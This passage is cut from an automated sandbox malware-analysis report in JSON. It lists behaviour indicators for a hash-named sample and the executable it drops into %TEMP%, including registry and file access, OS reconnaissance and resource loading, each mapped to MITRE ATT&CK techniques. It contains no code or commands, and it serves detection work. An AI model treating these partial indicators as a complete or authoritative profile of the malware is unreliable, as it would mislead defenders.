to access non-existent files (executable)", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" reads file \"c:\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\version.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004844]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"CAF705DD1089F2C05550A580E03F9975D44D1AABA0D13E638917D25143AD0F8E\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00004844)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" queries volume information of \"C:\\\" at 00000000-00004952-0000010C-168670\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004844-0000010C-283274\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002432-0000010C-583466", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004844)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" queries volume information of \"C:\\\" at 00000000-00004952-0000010C-168670\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004844-0000010C-283274\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002432-0000010C-583466", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006d00c81d6d00c31d6d00000000000000000000006a00000000019cdd22000000000000eb220095e16b774f8b0500feffffff435c6f7750596f77aa000000b8000000c21d6d00c01d6d0024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c6e7760d86275ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed6f77ea1d6d00a06a45758600000024df22005ce322000000000086008800a06a457524df2200916c4575ea1d6d00a06a4575a06a457594e3220002020000 (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004952)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f01d6b00eb1d6b00000000000000000000006800000000019cdc22000000000000ea220095e16b77cf880500feffffff435c6f7750596f77aa000000b8000000ea1d6b00e81d6b0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c6e7760d86275ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed6f77121e6b00a06a45758600000024de22005ce222000000000086008800a06a457524de2200916c4575121e6b00a06a4575a06a457594e2220002020000 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf007077d6007077536f487770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00004844)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004844)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00004952)\n 